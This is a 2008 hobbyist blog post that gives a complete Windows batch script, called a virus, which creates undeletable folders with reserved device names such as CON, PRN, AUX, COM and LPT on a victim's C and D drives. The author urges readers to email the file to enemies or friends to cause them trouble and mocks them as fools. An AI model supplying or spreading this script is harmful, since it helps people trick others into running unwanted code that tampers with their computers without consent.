Wednesday, July 30, 2008

Create folder Virus

Create folders which cannot be deleted (VIRUS)

In my bloges I have been giving you some ideas on how to create some simple viruses using .bat file here I am gonna show you haw to create a virus (.bat file) to create some unwanted folders in the hard disk.

Oh! Then they can easily delete the folders?

No this folders cannot be deleted as the way we normally delete the folders. So the normal computer users will not be able to delete this folders. If you wanna check this you can try this at your own computer with your own risk.

Ok let’s see how to create the virus

Just copy and past the highlighted lines in a notepad and save it as anyname.bat (you can give any name but the .bat extension should be there). this virus will create folders in “C”,”D” drives with the following names con, PRN, AUX, COM0, act..

@ECHO OFF

ECHO CREATING FOLDERS IN "C" DRIVE

md\\.\\C:\con

md\\.\\C:\PRN

md\\.\\C:\AUX

md\\.\\C:\COM0

md\\.\\C:\COM1

md\\.\\C:\COM2

md\\.\\C:\COM3

md\\.\\C:\COM4

md\\.\\C:\COM5

md\\.\\C:\COM6

md\\.\\C:\COM7

md\\.\\C:\COM8

md\\.\\C:\COM9

md\\.\\C:\LPT0

md\\.\\C:\LPT1

md\\.\\C:\LPT2

md\\.\\C:\LPT3

md\\.\\C:\LPT4

md\\.\\C:\LPT5

md\\.\\C:\LPT6

md\\.\\C:\LPT7

md\\.\\C:\LPT8

md\\.\\C:\LPT9

ECHO CREATING FOLDERS IN "D" DRIVE

md\\.\\D:\con

md\\.\\D:\PRN

md\\.\\D:\AUX

md\\.\\D:\COM0

md\\.\\D:\COM1

md\\.\\D:\COM2

md\\.\\D:\COM3

md\\.\\D:\COM4

md\\.\\D:\COM5

md\\.\\D:\COM6

md\\.\\D:\COM7

md\\.\\D:\COM8

md\\.\\D:\COM9

md\\.\\D:\LPT0

md\\.\\D:\LPT1

md\\.\\D:\LPT2

md\\.\\D:\LPT3

md\\.\\D:\LPT4

md\\.\\D:\LPT5

md\\.\\D:\LPT6

md\\.\\D:\LPT7

md\\.\\D:\LPT8

md\\.\\D:\LPT9

After you done you can send this anyname.bat file to your enemy or friends through e-mail or any other possible way to have some fun and put them in trouble when they going to delete these folders. when they run the anyname.bat file they will get the unwanted folders in they’re computer and when they try to delete those folders he he he funy you know ! you can prove there are fools.

Itsme

(Do this at your own risk I’m not responsible for anything)

For more information Wright me on itsiam@yahoo.com or leave a comment here .

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home